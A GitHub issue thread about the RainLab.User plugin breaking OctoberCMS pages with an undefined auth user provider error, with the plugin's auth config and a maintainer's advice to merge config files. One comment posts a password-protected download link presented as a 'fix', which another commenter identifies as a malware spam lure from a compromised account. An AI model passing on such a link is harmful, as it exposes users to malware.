### ISSUE TITLE
Can't access CMS Pages with plugin installed

### ISSUE THREAD

**Issue by russmatt** [rainlab/user-plugin#566]
As mentioned in the title, after installing the RainLab.User plugin version 3.1.3, the CMS pages become inaccessible with the following error:

`Authentication user provider [user] is not defined.
~/vendor/laravel/framework/src/Illuminate/Auth/CreatesUserProviders.php line 39`

This is the content of the config/auth.php file from the plugin:

```php
`/*
    |--------------------------------------------------------------------------
    | User Providers
    |--------------------------------------------------------------------------
    |
    | All authentication drivers have a user provider. This defines how the
    | users are actually retrieved out of your database or other storage
    | mechanisms used by this application to persist your user's data.
    |
    | If you have multiple user tables or models you may configure multiple
    | sources which represent each model / table. These sources may then
    | be assigned to any extra authentication guards you have defined.
    |
    | Supported: "database", "eloquent", "user"
    |
    */

    'providers' => [
        'users' => [
            'driver' => 'user',
            'model' => RainLab\User\Models\User::class,
        ],
    ],`
```

It seems that the createUserProvider method only accepts database and eloquent as drivers.

The version of OctoberCMS in use is 3.6.29.

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by russmatt** [comment]
@yldzmuhammed Man what is that?

**Comment by MahouShoujoMivutilde** [comment]
His pc is compromised.

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by daftspunk** [comment]
Hi @russmatt 

Check your config directory for an `auth.php` file, if it is present then it will take priority over the plugin's default configuration. You may need to merge the two, including the provider definition.

I hope this  helps!

**Comment by daftspunk** [comment]
This might be unrelated to the User plugin. Could you check the web server error log?
